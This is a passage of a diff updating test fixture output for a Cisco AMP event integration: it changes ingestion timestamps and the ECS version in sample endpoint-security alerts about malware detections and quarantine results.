@@ -1122,7 +1122,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:35.701361216Z", + "ingested": "2021-09-13T18:06:29.783745003Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1458617561791000300,\"timestamp\":1610618620,\"timestamp_nanoseconds\":791000000,\"date\":\"2021-01-14T10:03:40+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610618620,\"start_date\":\"2021-01-14T10:03:40+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Low_Prev_Retro\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"df:d1:ed:2d:c8:fc\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"A file containing a benign extension prior to the .exe extension was executed. This is indicative of suspicious behaviour in an attempt to conceal the malicious intent of the file.\",\"short_description\":\"W32.FakeExtensionExec.RET\"},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"report.pdf.exe\",\"file_path\":\"/c:/users/rsteadman/downloads/report.pdf.exe\",\"identity\":{\"sha256\":\"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"93b2ed4004ed5f7f3039dd7ecbd22c7e4e24b6373b4d9ef8d6e45a179b13a5e8\"}}}}}", "kind": "alert", "start": "2021-01-14T10:03:40.000Z", 
@@ -1182,7 +1182,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -1203,7 +1203,7 @@ "event": { "severity": 2, "action": "Quarantine Failure", - "ingested": "2021-09-12T17:32:35.701363103Z", + "ingested": "2021-09-13T18:06:29.783747078Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6880587034675643000,\"timestamp\":1610618511,\"timestamp_nanoseconds\":396000000,\"date\":\"2021-01-14T10:01:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6880587034675642558\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225530,\"description\":\"Object path not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_BP_WMIPRVSE\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"be:b0:d5:89:e2:96\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Unknown\",\"identity\":{\"sha256\":\"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e\"}}}}", "id": "6880587034675643000", "kind": "alert" @@ -1254,7 +1254,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -1275,7 +1275,7 @@ "event": { "severity": 2, "action": "Quarantine Failure", - "ingested": "2021-09-12T17:32:35.701365008Z", + "ingested": "2021-09-13T18:06:29.783749146Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6880587034675643000,\"timestamp\":1610618511,\"timestamp_nanoseconds\":396000000,\"date\":\"2021-01-14T10:01:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6880587034675642558\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225530,\"description\":\"Object path not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_BP_WMIPRVSE\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"be:b0:d5:89:e2:96\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Unknown\",\"identity\":{\"sha256\":\"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e\"}}}}", "id": "6880587034675643000", "kind": "alert" @@ -1326,7 +1326,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -1347,7 +1347,7 @@ "event": { "severity": 2, "action": "Quarantine Failure", - "ingested": "2021-09-12T17:32:35.701366987Z", + "ingested": "2021-09-13T18:06:29.783751302Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6880587034675643000,\"timestamp\":1610618511,\"timestamp_nanoseconds\":396000000,\"date\":\"2021-01-14T10:01:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6880587034675642558\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225530,\"description\":\"Object path not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_BP_WMIPRVSE\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"be:b0:d5:89:e2:96\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Unknown\",\"identity\":{\"sha256\":\"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e\"}}}}", "id": "6880587034675643000", "kind": "alert" @@ -1398,7 +1398,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -1419,7 +1419,7 @@ "event": { "severity": 2, "action": "Quarantine Failure", - "ingested": "2021-09-12T17:32:35.701368848Z", + "ingested": "2021-09-13T18:06:29.783753383Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6880587034675643000,\"timestamp\":1610618511,\"timestamp_nanoseconds\":396000000,\"date\":\"2021-01-14T10:01:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6880587034675642558\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225530,\"description\":\"Object path not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_BP_WMIPRVSE\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"be:b0:d5:89:e2:96\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Unknown\",\"identity\":{\"sha256\":\"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e\"}}}}", "id": "6880587034675643000", "kind": "alert" @@ -1470,7 +1470,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -1491,7 +1491,7 @@ "event": { "severity": 2, "action": "Quarantine Failure", - "ingested": "2021-09-12T17:32:35.701370740Z", + "ingested": "2021-09-13T18:06:29.783755459Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6880587034675643000,\"timestamp\":1610618511,\"timestamp_nanoseconds\":396000000,\"date\":\"2021-01-14T10:01:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6880587034675642558\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225530,\"description\":\"Object path not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_BP_WMIPRVSE\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"be:b0:d5:89:e2:96\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Unknown\",\"identity\":{\"sha256\":\"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e\"}}}}", "id": "6880587034675643000", "kind": "alert" @@ -1553,7 +1553,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ 
@@ -1583,7 +1583,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:35.701372604Z", + "ingested": "2021-09-13T18:06:29.783757523Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6880587030380676000,\"timestamp\":1610618510,\"timestamp_nanoseconds\":737000000,\"date\":\"2021-01-14T10:01:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"Generic.Malware.WX.9E93D282\",\"detection_id\":\"6880587021790740668\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_BP_WMIPRVSE\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"be:b0:d5:89:e2:96\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Unknown\",\"file_name\":\"p3fci4nu.dll\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\Temp\\\\p3fci4nu\\\\p3fci4nu.dll\",\"identity\":{\"sha256\":\"1e5d8b8b8e0d8b74643f7a68430f8dc703290190cc60dcdb4f08c9ecae342b48\"},\"parent\":{\"process_id\":6708,\"disposition\":\"Clean\",\"file_name\":\"csc.exe\",\"identity\":{\"sha256\":\"4240a12e0b246c9d69af1f697488fe7da1b497df20f4a6f95135b4d5fe180a57\",\"sha1\":\"93cf877f5627e55ec076a656e935042fac39950e\",\"md5\":\"23ee3d381cfe3b9f6229483e2ce2f9e1\"}}}}}", "kind": "alert", "action": "Threat Detected", 
@@ -1646,7 +1646,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -1666,7 +1666,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:35.701374528Z", + "ingested": "2021-09-13T18:06:29.783759589Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":460392585524661250,\"timestamp\":1610618215,\"timestamp_nanoseconds\":615000000,\"date\":\"2021-01-14T09:56:55+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610618215,\"start_date\":\"2021-01-14T09:56:55+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_MAP_FriedEx\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"04:e6:4d:d5:7a:b5\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"The psexec utility was executed as admin.\",\"short_description\":\"W32.PsexecAsAdmin.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"PsExec.exe\",\"file_path\":\"file:///C%3A/share%24/PsExec.exe\",\"identity\":{\"sha256\":\"3337e3875b05e0bfba69ab926532e3f179e8cfbf162ebb60ce58a0281437a7ef\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386\"}}}}}", "kind": "alert", "start": "2021-01-14T09:56:55.000Z", 
@@ -1729,7 +1729,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -1755,7 +1755,7 @@ }, "event": { "severity": 0, - "ingested": "2021-09-12T17:32:35.701376409Z", + "ingested": "2021-09-13T18:06:29.783761660Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6508191586038317000,\"timestamp\":1610611000,\"timestamp_nanoseconds\":758406329,\"date\":\"2021-01-14T07:56:40+00:00\",\"event_type\":\"File Fetch Completed\",\"event_type_id\":553648173,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"38:1e:eb:ba:2c:15\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"resume.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\Desktop\\\\resume.exe\",\"identity\":{\"sha256\":\"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86\",\"sha1\":\"5ca4bef8de6def53519d4b22632675bb4c1e470b\",\"md5\":\"41476df3138717868118d8542cf3d1d6\"}}}}", "kind": "alert", "action": "File Fetch Completed", @@ -1813,7 +1813,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -1833,7 +1833,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:35.701378300Z", + "ingested": "2021-09-13T18:06:29.783763725Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":7007136035192884000,\"timestamp\":1610603346,\"timestamp_nanoseconds\":403000000,\"date\":\"2021-01-14T05:49:06+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610603346,\"start_date\":\"2021-01-14T05:49:06+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_MAP_FriedEx\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"04:e6:4d:d5:7a:b5\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a shell was launched with an encoded command or to use Base64 to decode or encode an existing file or command. 
Malware authors may use this technique to bypass antivirus tools.\",\"short_description\":\"W32.PowershellEncodedBuffer.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"powershell.exe\",\"file_path\":\"file:///C%3A/Windows/System32/WindowsPowerShell/v1.0/powershell.exe\",\"identity\":{\"sha256\":\"a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8\"}}}}}", "kind": "alert", "start": "2021-01-14T05:49:06.000Z", @@ -1893,7 +1893,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -1913,7 +1913,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-12T17:32:35.701380257Z", + "ingested": "2021-09-13T18:06:29.783765876Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1515350231459808800,\"timestamp\":1610584664,\"timestamp_nanoseconds\":0,\"date\":\"2021-01-14T00:37:44+00:00\",\"event_type\":\"Threat Detected in Low Prevalence Executable\",\"event_type_id\":1107296278,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"38:1e:eb:ba:2c:15\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"resume.exe\",\"identity\":{\"sha256\":\"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86\"}}}}", "kind": "alert", "action": "Threat Detected in Low Prevalence Executable", @@ -1968,7 +1968,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -1994,7 +1994,7 @@ }, "event": { "severity": 0, - "ingested": "2021-09-12T17:32:35.701382106Z", + "ingested": "2021-09-13T18:06:29.783767954Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6508191586038317000,\"timestamp\":1610584030,\"timestamp_nanoseconds\":579890366,\"date\":\"2021-01-14T00:27:10+00:00\",\"event_type\":\"File Fetch Completed\",\"event_type_id\":553648173,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"38:1e:eb:ba:2c:15\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"resume.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\Desktop\\\\resume.exe\",\"identity\":{\"sha256\":\"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86\",\"sha1\":\"5ca4bef8de6def53519d4b22632675bb4c1e470b\",\"md5\":\"41476df3138717868118d8542cf3d1d6\"}}}}", "kind": "alert", "action": "File Fetch Completed", @@ -2040,7 +2040,7 @@ { "@timestamp": "2021-01-14T00:02:08.000Z", "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -2058,7 +2058,7 @@ "event": { "severity": 0, "action": "Policy Update", - "ingested": "2021-09-12T17:32:35.701383971Z", + "ingested": "2021-09-13T18:06:29.783770016Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6583671182384431000,\"timestamp\":1610582528,\"timestamp_nanoseconds\":614000000,\"date\":\"2021-01-14T00:02:08+00:00\",\"event_type\":\"Policy Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_MAP_FriedEx\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"04:e6:4d:d5:7a:b5\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}", "id": "6583671182384431000", "kind": "alert" @@ -2100,7 +2100,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -2120,7 +2120,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-12T17:32:35.701385864Z", + "ingested": "2021-09-13T18:06:29.783772071Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411132837046518000,\"timestamp\":1610552212,\"timestamp_nanoseconds\":695000000,\"date\":\"2021-01-13T15:36:52+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6411132837046517762\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960\"}}}}", "kind": "alert", "action": "Retrospective Quarantine Attempt Failed", @@ -2175,7 +2175,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -2195,7 +2195,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-12T17:32:35.701387740Z", + "ingested": "2021-09-13T18:06:29.783774129Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411132837046518000,\"timestamp\":1610552212,\"timestamp_nanoseconds\":691000000,\"date\":\"2021-01-13T15:36:52+00:00\",\"event_type\":\"Retrospective Quarantine\",\"event_type_id\":553648155,\"detection_id\":\"6411132837046517761\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960\"}}}}", "kind": "alert", "action": "Retrospective Quarantine", @@ -2248,7 +2248,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -2272,7 +2272,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-12T17:32:35.701389617Z", + "ingested": "2021-09-13T18:06:29.783776187Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411132837046518000,\"timestamp\":1610552212,\"timestamp_nanoseconds\":684000000,\"date\":\"2021-01-13T15:36:52+00:00\",\"event_type\":\"Retrospective 